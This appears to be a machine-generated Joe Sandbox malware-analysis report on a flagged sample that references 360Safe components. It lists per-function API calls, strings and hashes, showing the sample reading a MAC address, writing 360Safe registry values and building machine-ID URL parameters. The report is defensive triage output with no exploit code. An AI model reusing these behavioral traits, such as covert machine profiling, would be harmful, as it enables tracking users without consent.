Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: ,&L$,&L$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3476068407-3985702304
Opcode ID: 06a9a59fa7cfdbaf5b0e390a7c151bb8516534a1ec13b8d384039371debb77b1
Instruction ID: 83645f0a85907b076d934c5000bad3ad7476bc0fccc7c38b0cd5477933f1cb83
Opcode Fuzzy Hash: 06a9a59fa7cfdbaf5b0e390a7c151bb8516534a1ec13b8d384039371debb77b1
Instruction Fuzzy Hash: B52144B1D00208AAEB55EBE5C946FDDB7B8AF09708F20851EE12576192D7FC560CCB68

Function 0044E0D0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?), ref: 0044E0EA
GetCurrentProcessId.KERNEL32(?,?), ref: 0044E10B
_memset.LIBCMT ref: 0044E138
GetModuleFileNameW.KERNEL32(00000000,?,00000207), ref: 0044E14E
PathAppendW.SHLWAPI(00000000,..\), ref: 0044E170
PathAppendW.SHLWAPI(00000000,360conf.dll), ref: 0044E17A
StrCmpIW.SHLWAPI(00000000), ref: 0044E184

Strings

360conf.dll, xrefs: 0044E172
..\, xrefs: 0044E164

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AppendModulePath$CurrentFileHandleNameProcess_memset
String ID: ..\$360conf.dll
API String ID: 1173251288-1134607443
Opcode ID: 9d73298c1859ef131675fa24aeaa662315cf5a2b4b80396f5b0ec481edeecb8e
Instruction ID: babd91c0767c677867bfdc00c07ace6a545936477273bb783c810e3d84ce7e00
Opcode Fuzzy Hash: 9d73298c1859ef131675fa24aeaa662315cf5a2b4b80396f5b0ec481edeecb8e
Instruction Fuzzy Hash: 0B110DB1A4031C5BE724AB65DC85BEF776CFB04310F0085BFB70592181DAB89989CB9D

Function 0049E6B2 Relevance: 15.2, APIs: 10, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

APIs

__getbuf.LIBCMT ref: 004A457F
__fileno.LIBCMT ref: 004A4590
__fileno.LIBCMT ref: 004A45A1
__fileno.LIBCMT ref: 004A45AD
__fileno.LIBCMT ref: 004A45BD
__fileno.LIBCMT ref: 004A45E0
__fileno.LIBCMT ref: 004A45EC
__fileno.LIBCMT ref: 004A45F8
__fileno.LIBCMT ref: 004A4608
__cftof.LIBCMT ref: 004A4644

Part of subcall function 004A1E51: __wctomb_s_l.LIBCMT ref: 004A1E64

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fileno$__cftof__getbuf__wctomb_s_l
String ID:
API String ID: 1564009976-0
Opcode ID: dc69dc7fbc931b89cc1007c0417ed9439a3306e2f5d96ff4636ab145922e6048
Instruction ID: bc37aad22ed630eb5a172574e6de399923df5716b089e95bb7b7c62de78b7bca
Opcode Fuzzy Hash: dc69dc7fbc931b89cc1007c0417ed9439a3306e2f5d96ff4636ab145922e6048
Instruction Fuzzy Hash: B951D3325007059BCB20DF68D841AAE77E0AFE7328B24466FE4A587291D7BCE941CB5D

Function 0046C0D0 Relevance: 15.1, APIs: 10, Instructions: 98windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,?,?,00000000,?,?,?,?,C1DE166F,?,?), ref: 0046C0FB
IsWindow.USER32(?), ref: 0046C11E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046C12E
IsWindow.USER32(?), ref: 0046C147
TranslateMessage.USER32(?), ref: 0046C163
DispatchMessageW.USER32(?), ref: 0046C16D
IsWindow.USER32(?), ref: 0046C177
IsWindow.USER32(?), ref: 0046C193
PostMessageW.USER32(?,00000012,00000000,00000000), ref: 0046C1B1
DestroyWindow.USER32(?,?,?,?,?,C1DE166F,?,?), ref: 0046C1C2

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Message$DestroyDispatchPostShowTranslate
String ID:
API String ID: 945159221-0
Opcode ID: 57c7aeb8f609ca51b6251f38a7cdc336c925184a37725745ef94618587575966
Instruction ID: 5349b1554b7d6b13fafc1c1eb26ce4a0e1003e0a771229fe3ca6c72b9234300f
Opcode Fuzzy Hash: 57c7aeb8f609ca51b6251f38a7cdc336c925184a37725745ef94618587575966
Instruction Fuzzy Hash: 443193756003059BDB20EBB4CD84FAB77A8BF49750F44465EE981A7286E738F801CF69

Function 0046D180 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001111,00000000,?), ref: 0046D1C3
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0046D1E2
SendMessageW.USER32 ref: 0046D208
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 0046D222
SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046D25C
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 0046D26A
SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046D2CB

Strings

@, xrefs: 0046D1C5

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID: @
API String ID: 3850602802-2766056989
Opcode ID: 5971a3d964b6e07a4742c0332e442905c5b114d7358be48e7ffe015a40f8ca57
Instruction ID: b7bd524284e186e7f48b8f7d5358e5f6f1c13dbd9e4852ce79cf126c7cd55032
Opcode Fuzzy Hash: 5971a3d964b6e07a4742c0332e442905c5b114d7358be48e7ffe015a40f8ca57
Instruction Fuzzy Hash: D54140B1A09305ABD350CF69D885B9BF7E4FB88714F408A1EF6589B280DB74D904CBD6

Function 004AA6C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004AA6E2

Part of subcall function 004A95F0: _memset.LIBCMT ref: 004A9625
Part of subcall function 004A95F0: _memset.LIBCMT ref: 004A96CB
Part of subcall function 004A95F0: _strncat.LIBCMT ref: 004A974F

_memset.LIBCMT ref: 004AA769
SHGetValueA.SHLWAPI ref: 004AA79A
SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid_old,00000001,?,?), ref: 004AA809
SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,00000001,?,?), ref: 004AA838

Strings

mid, xrefs: 004AA783, 004AA829
Software\360Safe\Liveup, xrefs: 004AA788, 004AA7FF, 004AA82E
mid_old, xrefs: 004AA7FA

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset$Value$_strncat
String ID: Software\360Safe\Liveup$mid$mid_old
API String ID: 2533611499-1528303271
Opcode ID: 8f6c438cb50a4d85745fc3425b0a330f85dbf4cb33ab914b79417d4f446b5d7b
Instruction ID: 758354d98a482564694d2a295953df0d72ca489cbe1f97f5f4e6267debf25624
Opcode Fuzzy Hash: 8f6c438cb50a4d85745fc3425b0a330f85dbf4cb33ab914b79417d4f446b5d7b
Instruction Fuzzy Hash: F34136315083459BE321DB208885FF777E9AFA6304F14091EE58987281E778951DC7AB

Function 00403480 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

GetClassInfoExW.USER32(?,?,00000000), ref: 00403501
GetClassInfoExW.USER32(?,00000000,?), ref: 00403516
LoadCursorW.USER32(00000001,00007F00), ref: 00403553

Part of subcall function 00403CF0: LeaveCriticalSection.KERNEL32(00000000,?,004035C6), ref: 00403CFC

swprintf.LIBCMT ref: 0040357E
GetClassInfoExW.USER32(00000000,00000000,?), ref: 004035A3

Part of subcall function 00403D10: EnterCriticalSection.KERNEL32(?,?,004034B6), ref: 00403D16

Strings

ATL:%p, xrefs: 00403573
0, xrefs: 004034F9
8N, xrefs: 004034BA

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClassInfo$CriticalSection$CursorEnterLeaveLoadswprintf
String ID: 0$ATL:%p$8N
API String ID: 366415442-817474719
Opcode ID: 78fad2be2fe7b0124b9fe1f97222f5a458b66e93d80c15fe962a5749f8e3fa13
Instruction ID: 87f0e7fbd929693482ab41abb64797706c58507c6761fc839428e97343a2d437
Opcode Fuzzy Hash: 78fad2be2fe7b0124b9fe1f97222f5a458b66e93d80c15fe962a5749f8e3fa13
Instruction Fuzzy Hash: B3418C715143019BDB14DF14C8C4A6A7BA8EF88315F0046AEED049B3D6E778DE85CBAA

Function 004AA1A0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004AA1C5

Part of subcall function 004A9440: GetProcAddress.KERNEL32(00000000,Netbios), ref: 004A9463

_memset.LIBCMT ref: 004AA206
_memset.LIBCMT ref: 004AA227

Strings

%02X%02X%02X%02X%02X%02X, xrefs: 004AA2CF
3, xrefs: 004AA23A
7, xrefs: 004AA1D8
* , xrefs: 004AA230
2, xrefs: 004AA210

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset$AddressProc
String ID: %02X%02X%02X%02X%02X%02X$* $2$3$7
API String ID: 2047085092-1802369251
Opcode ID: 2ae8f57defed816fcd0dbdf2e043d280dfe4faec22ec5c4774c4ddad453272f2
Instruction ID: b5185da48c56e3bb05fd49e8d578d0ee374eb835078e2a388012ba28b7154dd0
Opcode Fuzzy Hash: 2ae8f57defed816fcd0dbdf2e043d280dfe4faec22ec5c4774c4ddad453272f2
Instruction Fuzzy Hash: FC41377150C3805FD321DB258C81BAB7BE86FEA304F4848AEF59947293D27C9619C76B

Function 004245A0 Relevance: 13.6, APIs: 9, Instructions: 134memorywindowCOMMON

Download Yara Rule

APIs

GdipGetImageWidth.GDIPLUS(?,?), ref: 004245C6
GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004245DD
GdipAlloc.GDIPLUS(00000010,?,?,?,?), ref: 004245EB
GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042461D
GdipSetPixelOffsetMode.GDIPLUS(00000000,00000002,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 00424645
GdipSetSmoothingMode.GDIPLUS(?,00000004,00000000,00000002,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 00424656
GdipDrawImageRectI.GDIPLUS(?,00000000,?,00000000,?,?,?,00000004,00000000,00000002,?,?,00000000,0026200A,00000000,?), ref: 004246BD
GdipDeleteGraphics.GDIPLUS(00000000,?,00000000,?,00000000,?,?,?,00000004,00000000,00000002,?,?,00000000,0026200A,00000000), ref: 004246D2
GdipFree.GDIPLUS(?,00000000,?,00000000,?,00000000,?,?,?,00000004,00000000,00000002,?,?,00000000,0026200A), ref: 004246D8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$Image$Mode$AllocBitmapCreateDeleteDrawFreeFromGraphicsHeightOffsetPixelRectScan0SmoothingWidth
String ID:
API String ID: 4157487250-0
Opcode ID: e3cf0a69b922c1f095475634fdfa1c3cf12872b3884a6a262bca07d32cf31a50
Instruction ID: 2d8f88f892067c8462d36ef45ad906f247f62c8cedfde0274191c8c77dfeeccb
Opcode Fuzzy Hash: e3cf0a69b922c1f095475634fdfa1c3cf12872b3884a6a262bca07d32cf31a50
Instruction Fuzzy Hash: CB41D671B00229AFDB20EFA9E8C196EB3F8EF85318B50456FF949D7300D638AD518B54

Function 00442730 Relevance: 13.6, APIs: 9, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00442769
SysFreeString.OLEAUT32(00000000), ref: 0044278B
SysStringLen.OLEAUT32(?), ref: 0044279B
SysStringLen.OLEAUT32(?), ref: 004427A5
CoTaskMemAlloc.OLE32(00000002), ref: 004427AC
SysFreeString.OLEAUT32(?), ref: 004427BF

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: String$AllocFree$Task
String ID:
API String ID: 1511711959-0
Opcode ID: af17a773843fe2677d21ba650797fdc4f39f0b8e8a526ef2a21419ef42245db8
Instruction ID: 49859850150a05cee1c5faa8b7596b5dd248a8acb7461314ecf7bfa1790a2522
Opcode Fuzzy Hash: af17a773843fe2677d21ba650797fdc4f39f0b8e8a526ef2a21419ef42245db8
Instruction Fuzzy Hash: D8214F7A2001086BEB00DF69DC84DAB7BACEFC8750B15852AFD08CB301D675E952CBB4

Function 0046B1C0 Relevance: 13.6, APIs: 9, Instructions: 86libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(004622D2,00000000,00000002,00000000,00000000,?,?,?,?,?,004B3EA8,000000FF,?,004622D2), ref: 0046B1CE
FindResourceW.KERNEL32(00000000,00000001,00000010,?,?,?,?,?,004B3EA8,000000FF,?,004622D2), ref: 0046B1E0
SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,004B3EA8,000000FF,?,004622D2), ref: 0046B1EE
LoadResource.KERNEL32(00000000,00000000,?,?,?,?,004B3EA8,000000FF,?,004622D2), ref: 0046B1F9
LockResource.KERNEL32(00000000,?,?,?,?,004B3EA8,000000FF,?,004622D2), ref: 0046B206
_malloc.LIBCMT ref: 0046B217

Part of subcall function 0048C93D: __FF_MSGBANNER.LIBCMT ref: 0048C960
Part of subcall function 0048C93D: __NMSG_WRITE.LIBCMT ref: 0048C967
Part of subcall function 0048C93D: HeapAlloc.KERNEL32(00000000,000000F5,00000001,00000000,00000000,?,0049566D,00000104,00000001,00000104,?,00498EAC,00000018,004CD298,0000000C,00498F3D), ref: 0048C9B4

FreeResource.KERNEL32(00000000,?,?,?,?,004B3EA8,000000FF,?,004622D2), ref: 0046B237
FreeLibrary.KERNEL32(00000000,?,?,?,?,004B3EA8,000000FF,?,004622D2), ref: 0046B23E
VerQueryValueW.VERSION(00000000,004BD884,?,?,?,?,?,?,004B3EA8,000000FF,?,004622D2), ref: 0046B25F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Resource$FreeLibraryLoad$AllocFindHeapLockQuerySizeofValue_malloc
String ID:
API String ID: 1041246626-0
Opcode ID: e42b1cdf476ad055ca0b43417ff9ed3a5953764b47d73e8aabebb3e4398db584
Instruction ID: 75bb19a690ce7a6e8dde061dc7e7b53df22a734e4c3f87b14500777dee3a3cb9
Opcode Fuzzy Hash: e42b1cdf476ad055ca0b43417ff9ed3a5953764b47d73e8aabebb3e4398db584
Instruction Fuzzy Hash: 54219276900319AFC7119BA49C98DAFB7BCEB89B50F1441A9FC05D3301EB359E41C7A9

Function 0048236A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004822CA: GetParent.USER32(?), ref: 0048231E
Part of subcall function 004822CA: GetLastActivePopup.USER32(?), ref: 0048232F
Part of subcall function 004822CA: IsWindowEnabled.USER32(?), ref: 00482343
Part of subcall function 004822CA: EnableWindow.USER32(?,00000000), ref: 00482356

EnableWindow.USER32(?,00000001), ref: 004823B7
GetWindowThreadProcessId.USER32(?,?), ref: 004823CB
GetCurrentProcessId.KERNEL32(?,?), ref: 004823D5
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 004823ED
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 00482469
EnableWindow.USER32(00000000,00000001), ref: 004824B0

Strings

0, xrefs: 00482442

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: 3a17390735f5fddf6c080ee8498bc24afbfb48a6793156dff0f54a77fe800a1c
Instruction ID: 8e585c70b680c40b4d562465b8605060ad5ecccd812445ed05c6be24a330da52
Opcode Fuzzy Hash: 3a17390735f5fddf6c080ee8498bc24afbfb48a6793156dff0f54a77fe800a1c
Instruction Fuzzy Hash: 13410671A00218ABCB21EF24DD85BDE77B8FF14710F10099AF815D6290D7B8CE81CBA8

Function 00455270 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 109COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004553DA

Strings

&os=, xrefs: 004552C7
&ch=, xrefs: 004552BB
&lan=, xrefs: 004552D3
&sch=, xrefs: 004552AF
mid=, xrefs: 004552EF
&ver=, xrefs: 004552DF

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: &ch=$&lan=$&os=$&sch=$&ver=$mid=
API String ID: 323602529-542971112
Opcode ID: dfbdbd56782aee9fd8e418f71824a0b4deda66e6a8e39352fae530e8ffcd4117
Instruction ID: 840ed64917230c0a54618ed9ac3dbe9a2ed77d24c9761ca8519f7032c5e7c113
Opcode Fuzzy Hash: dfbdbd56782aee9fd8e418f71824a0b4deda66e6a8e39352fae530e8ffcd4117
Instruction Fuzzy Hash: 1B31EBF5D54340AEC610BB62EC47F17779C5B5071AF104B1EB85862183FABDA50CC69E

Function 0047A530 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,?,00475D38,00000000,00000000,00000CCC,00000040,?,?,?,00004000), ref: 0047A5A9
__CxxThrowException@8.LIBCMT ref: 0047A5D9
TlsSetValue.KERNEL32(?,00000000,?,00475D38,00000000,00000000,00000CCC,00000040,?,?,?,00004000), ref: 0047A5EE
__CxxThrowException@8.LIBCMT ref: 0047A608
ReleaseMutex.KERNEL32(?,00000004,004CD9E8), ref: 0047A63E

Strings

(bN, xrefs: 0047A5B6

